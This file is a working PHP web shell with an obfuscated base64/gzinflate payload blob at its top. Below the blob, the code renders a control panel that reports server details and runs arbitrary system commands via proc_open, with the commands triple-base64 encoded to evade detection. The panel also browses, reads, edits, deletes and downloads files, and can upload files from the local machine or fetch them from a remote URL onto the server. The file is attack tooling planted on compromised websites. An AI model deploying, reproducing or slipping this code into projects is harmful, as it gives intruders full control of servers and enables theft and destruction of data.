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";
echo var_dump(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
echo var_dump(gzuncompress(gzinflate(base64_decode(strrev($Lix)))));
?>

<!DOCTYPE html>
<html>
<head>
    <meta name="theme-color" content="#1f1f1f">
</head>
<body bgcolor="#1f1f1f" text="#ffffff">
<link href="" rel="stylesheet" type="text/css">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">
<style>
    @import url('https://fonts.googleapis.com/css?family=Dosis');
    @import url('https://fonts.googleapis.com/css?family=Bungee');
body {
    font-family: "Dosis", cursive;
    text-shadow:0px 0px 1px #757575;
}

body::-webkit-scrollbar {
  width: 12px;
}

body::-webkit-scrollbar-track {
  background: #1f1f1f;
}

body::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

#content tr:hover {
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}

#content .first {
    background-color: #25383C;
}

#content .first:hover {
    background-color: #25383C
    text-shadow:0px 0px 1px #757575;
}

table {
    border: 1px #000000 dotted;
    table-layout: fixed;
    word-break: break-all;
}

textarea {
    max-width: 95%;
    max-height: 100%;
    resize: none;
    outline: none;
    overflow: auto;
    background: transparent;
    color: #fff;
}

textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #1f1f1f;
}

textarea::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

a {
    color: #ffffff;
    text-decoration: none;
}

a:hover {
    color: gold;
    text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}

.gas {
    background-color: #1f1f1f;
    color: #ffffff;
    cursor: pointer;
}

select {
    background-color: transparent;
    color: #ffffff;
}

select:after {
    cursor: pointer;
}

.linka {
    background-color: transparent;
    color: #ffffff;
}

.up {
    background-color: transparent;
    color: #fff;
}

option {
    background-color: #1f1f1f;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<script>
function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }

async function loadFile(file) {
    let text = await file.text();
    document.getElementById("bepasdata").innerHTML = text;
}
</script>
<center>
<font face="Bungee" size="5"></font></center>	
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>
<?php
set_time_limit(0);
error_reporting(0);

$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
    $disf = "<font color='gold'>NONE</font>";
} else {
    $disf = "<font color='red'>".$disfunc."</font>";
}

function author() {
    echo "<center><br></center>";
    exit();
}

function cekdir() {
    if (isset($_GET['path'])) {
        $lokasi = $_GET['path'];
    } else {
        $lokasi = getcwd();
    }
    if (is_writable($lokasi)) {
        return "<font color='green'>Writeable</font>";
    } else {
        return "<font color='red'>Writeable</font>";
    }
}

function cekroot() {
    if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
        return "<font color='green'>Writeable</font>";
    } else {
        return "<font color='red'>Writeable</font>";
    }
}

function xrmdir($dir) {
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        $path = $dir.'/'.$item;
        if (is_dir($path)) {
            xrmdir($path);
        } else {
            unlink($path);
        }
    }
    rmdir($dir);
}

function dunlut($file) {
    if (!is_readable($file)) {
        red("Cannot Download File / Unreadable File !");
        die();
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    flush();
    readfile($file);
    die();
}

function owner($file) {
    if (function_exists("posix_getpwuid")) {
        $tod = @posix_getpwuid(fileowner($file));
        return "<center>".$tod['name']."</center>";
    } else {
        return "<center>".fileowner($file)."</center>";
    }
}

function cekwrite($lokasi) {
    $izin = substr(sprintf('%o', fileperms($lokasi)), -4);
    if (is_writable($lokasi)) {
        return "<font color=green>".$izin."</font>";
    } else {
        return "<font color=red>".$izin."</font>";
    }
}

function ekse($komend, $lokasi) {
    if (!function_exists("proc_open")) {
        die("proc_open function disabled !");
    } elseif (!function_exists("base64_decode")) {
        die("base64_decode function disabled !");
    }
    $komen = base64_decode(base64_decode(base64_decode($komend)));
    $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi);
    echo "<textarea rows='25' cols='100'>".htmlspecialchars(stream_get_contents($pipes[1]))."</textarea><br><br>";
}

function ipserv() {
    if (empty($_SERVER['SERVER_ADDR'])) {
        return gethostbyname($_SERVER['SERVER_NAME']);
        if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
            return $_SERVER['SERVER_NAME'];
        }
    } else {
        return $_SERVER['SERVER_ADDR'];
    }
}

function cekfile($file) {
     return '<i class="fa fa-file" style="color: #d6d4ce"></i> ';
}

function filedate($file) {
    return date("F d Y g:i:s", filemtime($file));
}

function unzip($file, $lokasi) {
    if (!is_readable($file)) {
        red("Cannot Unzip File / Unreadable File !");
        die();
    } elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
        red("This isn't Zip File !");
        die();
    }
    $zip = new ZipArchive;
    $res = $zip -> open($file);
    if ($res == true) {
        $zip -> extractTo($lokasi);
        $zip -> close();
        green("Success Unzip File !");
    } else {
        red("Failed to Unzip File !");
    }
}

function green($text) {
    echo "<center><font color='green'>".$text."</center></font>";
}

function red($text) {
    echo "<center><font color='red'>".$text."</center></font>";
}

echo "Server IP : <font color=gold>".ipserv()."</font> &nbsp;/&nbsp; Your IP : <font color=gold>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "Web Server : <font color='gold'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
echo "System : <font color='gold'>".php_uname()."</font><br>";
echo "User : <font color='gold'>".@get_current_user()."&nbsp;</font>( <font color='gold'>".@getmyuid()."</font>)<br>";
echo "PHP Version : <font color='gold'>".@phpversion()."</font><br>";
echo "Disable Function : ".$disf."</font><br>";
echo "MySQL : ";
if (function_exists("mysql_connect")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}

foreach($_POST as $key => $value){
    $_POST[$key] = stripslashes($value);
}

if(isset($_GET['path'])){
    $lokasi = $_GET['path'];
    $lokdua = $_GET['path'];
} else {
    $lokasi = getcwd();
    $lokdua = getcwd();
}

$lokasi = str_replace('\\','/',$lokasi);
$lokasis = explode('/',$lokasi);
$lokasinya = @scandir($lokasi);

echo "<br>Directory (".cekwrite($lokasi).") : &nbsp;";

foreach($lokasis as $id => $lok){
    if($lok == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($lok == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
    echo "$lokasis[$i]";
    if($i != $id) echo "/";
} 
echo '">'.$lok.'</a>/';
}

echo '</td></tr><tr><td>';
if (isset($_POST['upwkwk'])) {
    if ($_POST['dirnya'] == "2") {
            $lokasi = $_SERVER['DOCUMENT_ROOT'];
        }
    if (isset($_POST['berkasnya'])) {
        $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name']));
        if (file_exists($lokasi."/".$_FILES['berkas']['name'])) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$_FILES['berkas']['name']."</i></font><br><br>";
        } else {
            echo "<font color='red'>Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['linknya'])) {
        if (empty($_POST['namalink'])) {
            exit("Filename cannot be empty !");
        }
        if ($_POST['dirnya'] == "2") {
            $lokasi = $_SERVER['DOCUMENT_ROOT'];
        }
        $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink']));
        if (file_exists($lokasi."/".$_POST['namalink'])) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$_POST['namalink']."</i></font><br><br>";
        } else {
            echo "<font coloe='red'>Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['bepas'])) {
        $bepasdata = $_POST['bepasdata'];
        $bepasnama = $_POST['bepasnama'];
        if ($bepasdata) {
            echo "string";
        }
        @file_put_contents($lokasi."/".$bepasnama, $bepasdata);
        if (file_exists($lokasi."/".$bepasnama)) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$bepasnama."</i></font><br><br>";
        } else {
            echo "<font coloe='red'>Failed to Upload !<br><br>";
        }
    }
}

echo "</table><br>";
echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">';
echo '<th>[ &nbsp;<a href="'.$_SERVER['SCRIPT_NAME'].'">Home</a>&nbsp; ]</th>';
echo '<th>[ &nbsp;<a href="?path='.$lokasi.'&komend=gaskan">C0mmand</a>&nbsp; ]</th>';
echo '<th>[ &nbsp;<a href="?path='.$lokasi.'&upload=gaskan">Upload File</a>&nbsp; ]</th>';
echo "</table><br>";

if (isset($_GET['fileloc'])) {
    echo "<tr><td>Current File : ".$_GET['fileloc'];
    echo '</tr></td></table><br/>';
    echo "<pre>".htmlspecialchars(file_get_contents($_GET['fileloc']))."</pre>";
    author();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
    if (is_dir($_POST['path'])) {
        xrmdir($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to delete Directory !");
        } else {
            green("Delete Directory Success !");
        }
    } elseif (is_file($_POST['path'])) {
        @unlink($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to Delete File !");
        } else {
            green("Delete File <i>".basename($_POST['path'])."</i> Success !");
        }
    }
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
    if (isset($_POST['gantin'])) {
        $ren = @rename($_POST['path'], $_POST['newname']);
        if ($ren == true) {
            green("Change Name Success !");
        } else {
            red("Change Name Failed !");
        }
    }
    if (empty($_POST['name'])) {
        $namaawal = $_POST['newname'];
    } else {
        $namawal = $_POST['name'];
    }
    echo "<center>".$_POST['path']."<br>";
    echo '<form method="post">
    New Name : <input name="newname" type="text" class="up" size="20" value="'.$namaawal.'" />
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="pilih" value="gantinama">
    <input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
    </form>';
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
    if (isset($_POST['gasedit'])) {
        $edit = @file_put_contents($_POST['path'], $_POST['src']);
        if ($edit == true) {
            green("Edit File Success !");
        } else {
            red("Edit File Failed !");
        }
    }
    echo "<center>".$_POST['path']."<br><br>";
    echo '<form method="post">
    <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br>
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="pilih" value="edit">
    <input type="submit" value="Edit File" name="gasedit" />
    </form><br>';
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "dunlut") {
    dunlut($_POST['path']);
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
    unzip($_POST['path'], $lokasi);
} elseif ($_REQUEST['upload'] == "gaskan") {
    echo "<center>Upload File : ";
    echo '<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ '.cekdir().' ]
<input type="radio" value="2" name="dirnya" >document_root [ '.cekroot().' ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>
Upload File From Link :<br>
<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>
<input type="hidden" name="bepasnama" id="namanya">
<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>
<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>';
} elseif ($_GET['komend'] == "gaskan") {
    echo "<center>";
    echo '<form method="post" onsubmit="document.getElementById(\'komendnya\').value = btoa(btoa(btoa(document.getElementById(\'komendnya\').value)))">
    '.@get_current_user().'@'.ipserv().':~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">
    <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">
    </form><br>';
    if (isset($_POST['eksekomend'])) {
        ekse($_POST['komend'], $lokasi);
    }
    echo "</center>";
} 

if (!is_readable($lokasi)) {
    die("<center>This directory is unreadable :(</center>");
}

echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>
<td><center>Owner</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

foreach($lokasinya as $dir){
    if(!is_dir($lokasi."/".$dir) || $dir == '.') continue;
    echo "<tr>
    <td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?path=".$lokasi."/".$dir."\">".$dir."</a></td>
    <td><center>--</center></td>
    <td><center>".filedate($lokasi."/".$dir)."</center></td>
    <td>".owner($lokasi."/".$dir)."</td>
    <td><center>";
    if(is_writable($lokasi."/".$dir)) echo '<font color="green">';
    elseif(!is_readable($lokasi."/".$dir)) echo '<font color="red">';
    echo statusnya($lokasi."/".$dir);
    if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo '</font>';

    echo "</center></td>
    <td><center><form method=\"POST\" action=\"?pilihan&path=$lokasi\">
    <select name=\"pilih\">
    <option value=\"\"></option>
    <option value=\"hapus\">Delete</option>
    <option value=\"gantinama\">Rename</option>
    </select>
    <input type=\"hidden\" name=\"type\" value=\"dir\">
    <input type=\"hidden\" name=\"name\" value=\"$dir\">
    <input type=\"hidden\" name=\"path\" value=\"$lokasi/$dir\">
    <input type=\"submit\" class=\"gas\" value=\">\" />
    </form></center></td>
    </tr>";
}

echo '<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>';
foreach($lokasinya as $file) {
    if(!is_file("$lokasi/$file")) continue;
    $size = filesize("$lokasi/$file")/1024;
    $size = round($size,3);
    if($size >= 1024){
    $size = round($size/1024,2).' MB';
} else {
    $size = $size.' KB';
}

echo "<tr>
<td>".cekfile($lokasi."/".$file)."<a href=\"?fileloc=$lokasi/$file&path=$lokasi\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($lokasi."/".$file)."</center></td>
<td>".owner($lokasi."/".$file)."</td>
<td><center>";
if(is_writable("$lokasi/$file")) echo '<font color="green">';
elseif(!is_readable("$lokasi/$file")) echo '<font color="red">';
echo statusnya("$lokasi/$file");
if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo '</font>';
echo "</center></td><td><center>
<form method=\"post\" action=\"?pilihan&path=$lokasi\">
<select name=\"pilih\">
<option value=\"\"></option>
<option value=\"hapus\">Delete</option>
<option value=\"dunlut\">Download</option>
<option value=\"gantinama\">Rename</option>
<option value=\"edit\">Edit</option>";
if (class_exists("ZipArchive")) {
    echo "<option value=\"unzip\">Unzip</option>";
}
echo "</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$lokasi/$file\">
<input type=\"submit\" class=\"gas\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</tr></td></table></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>